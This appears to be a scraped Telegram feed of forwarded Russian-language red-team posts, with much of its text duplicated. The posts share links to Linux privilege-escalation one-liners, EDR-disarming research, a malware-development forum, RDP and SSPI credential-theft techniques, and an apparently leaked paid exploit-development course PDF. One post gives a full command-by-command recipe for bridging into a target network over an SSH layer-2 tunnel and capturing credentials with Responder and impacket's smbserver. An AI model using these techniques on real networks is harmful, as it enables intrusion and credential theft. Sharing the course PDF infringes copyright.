Forwarded from RedTeam brazzers (Pavel Shlundin)
This media is not supported in your browser
VIEW IN TELEGRAM
Forwarded from RedTeam brazzers (Pavel Shlundin)
По многочисленным просьбам добавил в ldap_shell интерактивную консоль (подсказки, дополнения,история и пр), чтение паролей GMSA, а так же поправил некоторые обнаруженные ранее баги. Обновил todo лист - наметил дальнейший путь развития инструмента.
Forwarded from 1N73LL1G3NC3
Attacking an EDR - Part 1
This post is the first of what - we hope - will be a long series of articles detailing some common flaws that can be found on modern EDR products. By no means this will be a complete reference, but will hopefully provide some practical tools to analyze these gargantuesque products and attempt to understand their functionalities from a black box perspective.
This post is the first of what - we hope - will be a long series of articles detailing some common flaws that can be found on modern EDR products. By no means this will be a complete reference, but will hopefully provide some practical tools to analyze these gargantuesque products and attempt to understand their functionalities from a black box perspective.
Forwarded from 1N73LL1G3NC3
1N73LL1G3NC3
Attacking an EDR - Part 1 This post is the first of what - we hope - will be a long series of articles detailing some common flaws that can be found on modern EDR products. By no means this will be a complete reference, but will hopefully provide some practical…
Attacking an EDR - Part 2
This time around, our focus will be on the communication channel between the EDR agent and its tenant.
For those who are not familiar with the generic EDR architecture, in most cases the agents that will be deployed on the systems will eventually need to communicate to a centralized tenant. This is usually done because EDR agents needs to:
• Fetch policies from the centralized tenant and apply new policies
• Send telemetry back to the central instance
As you can imagine, this component is particularly crucial and any interference or tampering could potentially have devastating outcomes. As we did last time, we will begin with formulating an hypothesis that will be validated throughout the rest of this blog post.
This time around, our focus will be on the communication channel between the EDR agent and its tenant.
For those who are not familiar with the generic EDR architecture, in most cases the agents that will be deployed on the systems will eventually need to communicate to a centralized tenant. This is usually done because EDR agents needs to:
• Fetch policies from the centralized tenant and apply new policies
• Send telemetry back to the central instance
As you can imagine, this component is particularly crucial and any interference or tampering could potentially have devastating outcomes. As we did last time, we will begin with formulating an hypothesis that will be validated throughout the rest of this blog post.
riccardoancarani.github.io
Attacking an EDR - Part 2
For less fun but even more profit
Forwarded from 1N73LL1G3NC3
1N73LL1G3NC3
Attacking an EDR - Part 2 This time around, our focus will be on the communication channel between the EDR agent and its tenant. For those who are not familiar with the generic EDR architecture, in most cases the agents that will be deployed on the systems…
Attacking an EDR - Part 3
In this third and last part of this series, we will dig deeper in the EDR’s update process and uncover some logic flaws that, ultimately, led us to the complete disarmament of the solution. Additionally, as an unexpected treat for our effort, a new ‘LOLBin’ was also discovered along the way. This part will be a bit more code-heavy, we will try to minimize the unnecessary bloat but the reader might need to pivot through some additional references to get the most out of this.
In this third and last part of this series, we will dig deeper in the EDR’s update process and uncover some logic flaws that, ultimately, led us to the complete disarmament of the solution. Additionally, as an unexpected treat for our effort, a new ‘LOLBin’ was also discovered along the way. This part will be a bit more code-heavy, we will try to minimize the unnecessary bloat but the reader might need to pivot through some additional references to get the most out of this.
Forwarded from Zer0way
https://ru-sfera.pw/forums/vvedenie-v-razrabotku-vredonosnyx-programm.176/
Интересные статьи и все собрано в одном месте. Спуфинг commandline прям понравилось
Интересные статьи и все собрано в одном месте. Спуфинг commandline прям понравилось
#Linux #LPE #2021 #CVE
Однострочное поднятие на Debian/Ubuntu/RedHad/SUSE системах до 2021-го года (до фикса).
Требуется компилятор С
https://github.com/berdav/CVE-2021-4034
Однострочное поднятие на Debian/Ubuntu/RedHad/SUSE системах до 2021-го года (до фикса).
Требуется компилятор С
https://github.com/berdav/CVE-2021-4034
GitHub
GitHub - berdav/CVE-2021-4034: CVE-2021-4034 1day
CVE-2021-4034 1day. Contribute to berdav/CVE-2021-4034 development by creating an account on GitHub.
#Linux #LPE #2023 #CVE
Ещё одно однострочное поднятие на Linux системах до 2023-го года (до фикса).
З.Ы. Может стрелять не везде
https://github.com/ThrynSec/CVE-2023-32629-CVE-2023-2640---POC-Escalation/tree/main
Ещё одно однострочное поднятие на Linux системах до 2023-го года (до фикса).
З.Ы. Может стрелять не везде
https://github.com/ThrynSec/CVE-2023-32629-CVE-2023-2640---POC-Escalation/tree/main
GitHub
GitHub - ThrynSec/CVE-2023-32629-CVE-2023-2640---POC-Escalation: Ubuntu Privilege Escalation bash one-liner using CVE-2023-32629…
Ubuntu Privilege Escalation bash one-liner using CVE-2023-32629 & CVE-2023-2640 - ThrynSec/CVE-2023-32629-CVE-2023-2640---POC-Escalation
Forwarded from Magama Bazarov
Caster Ethernet Attacks ][ Version.png
127.4 KB
Forwarded from sn🥶vvcr💥sh
https://www.pentestpartners.com/security-blog/abusing-rdps-remote-credential-guard-with-rubeus-ptt/
🙃
🙃
Pen Test Partners
Abusing RDP's Remote Credential Guard with Rubeus PTT | Pen Test Partners
TL;DR Introduction Historically, attacks on RDP using Pass-The-Hash and Pass-The-Ticket techniques have not been possible. Typically, Windows performed an interactive logon when connecting to RDP, therefore valid credentials were always required to perform…
Forwarded from -_-
ReadytoRun stomping прогугли
И в lnk завернёшь
И в lnk завернёшь
❤1
Forwarded from Zeebra
https://shorsec.io/blog/malrdp-implementing-rouge-rdp-manually/
Вот это неплохой вариант, чуть сложнее чем с lnk нагрузками
Вот это неплохой вариант, чуть сложнее чем с lnk нагрузками
❤1
Forwarded from Shmelev Jaroslav
В общем, вот рецепт для тех кто хочет SSH Nightmare:
Вводные - нужен доступ к Linux-хосту от root, PermitTunnel yes и два сетевых интерфейса на машине (можно и через один, но есть риск DoS при ошибках в конфигурации). В примере рассмотрим ситуацию когда есть внешний интерфейс eth0 и интерфейс в атакуемую сеть (eth1, 10.0.0.0/24).
1) Делаем туннель:
7) PROFIT!
Вводные - нужен доступ к Linux-хосту от root, PermitTunnel yes и два сетевых интерфейса на машине (можно и через один, но есть риск DoS при ошибках в конфигурации). В примере рассмотрим ситуацию когда есть внешний интерфейс eth0 и интерфейс в атакуемую сеть (eth1, 10.0.0.0/24).
1) Делаем туннель:
sudo ssh -i ~/.ssh/id_rsa -o Tunnel=ethernet -w 1:1 root@<linux>2) На локальной машине включаем интерфейс и выбираем свободный адрес в изолированной сети:
sudo ip link set tap1 up3) На удаленной машине делаем сетевой мост и назначаем ему адрес от интерфейса eth1:
sudo ip addr add 10.0.0.4/24 dev tap1
sudo brctl addbr bridgeforattackДля случая с 1 интерфейсом после смены IP обязательно нужно прописать дефолтный роут, например:
sudo brctl addif bridgeforattack tap1
sudo brctl addif bridgeforattack eth1
sudo ip addr del 10.0.0.2/24 dev eth1
sudo ip addr add 10.0.0.2/24 dev bridgeforattack
sudo ip link set dev tap1 up
sudo ip link set dev bridgeforattack up
sudo ip route add default via 10.0.2.14) Проверяем L2-доступ к сети с локальной машины:
ping -c1 10.0.0.15) Готовим атаку: спуфим респондером с отключенным SMB, а соединение принимаем на smbserver из impacket (респондер тоже их ловит, но часто дропает коннекты хз почему)
sudo responder -I tap16) ???
smbserver.py -smb2support share .
7) PROFIT!
Forwarded from Похек (Sergey Zybnev)
#подборка #awesome
John Hammond
STÖK
LiveOverflow
The XSS rat
Sathvik Techtuber
Guided Hacking
NetworkChuck
Grant Collins
Positive Events
OFFZONE MOSCOW
PwnFunction
DEFCONConference
David Bombal
HackTricks
PayloadsAllTheThings
Xakep
Poxek
PortSwigger
SecurityLab
Codeby
Awesome DevSecOps
iOS Security Awesome
Android Security Awesome
Personal Security Checklist
RedTeam Tools
OWASP Cheat Sheet Series
six2dez pentest-book
Awesome Bugbounty Writeups
Blog INTIGRITI
PentesterLand Writeups
Pentesting AD mindmap
Conference slides
TryHackMe
HackTheBox
VulnHub
GoAD
Exploit-DB
PortSwigger Academy
bWAPP
WebGoat
OWASP Juice Shop
FVWA
Root-Me
OverTheWire
Crackmes
Atomic Red Team
Codeby Games
Standoff КиберПолигон
HH
Хабр Карьера
BI.ZONE Bug Bounty
StandOff Bug Bounty
Yandex Bug Bounty
BUG BOUNTY RU
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Hack IT Easy
EXP-301-2022(OSED).pdf
8.6 MB
EXP-301-2022 💻❗️
Для всех, кто спрашивал про EXP-301 - пожалуйста)
Буду рад, если кто-то поделится мнением после изучения😊
P.S. Видео тоже есть, если будет много желающих - загружу
Для всех, кто спрашивал про EXP-301 - пожалуйста)
Буду рад, если кто-то поделится мнением после изучения😊
P.S. Видео тоже есть, если будет много желающих - загружу
Forwarded from Хакер — Xakep.RU
Магия SSPI. Достаем учетные данные Windows, не трогая LSASS #статьи #подписчикам
Windows позволяет разработчикам создавать шифрованные каналы связи, подписывать сообщения между клиентом и службой, аутентифицировать клиента на службе. Злоупотребляя этими возможностями, мы можем извлекать учетные данные пользователя без взаимодействия с LSASS. В этой статье я продемонстрирую, как это работает.
https://xakep.ru/2023/12/08/sspi-hack/
Windows позволяет разработчикам создавать шифрованные каналы связи, подписывать сообщения между клиентом и службой, аутентифицировать клиента на службе. Злоупотребляя этими возможностями, мы можем извлекать учетные данные пользователя без взаимодействия с LSASS. В этой статье я продемонстрирую, как это работает.
https://xakep.ru/2023/12/08/sspi-hack/
🔥1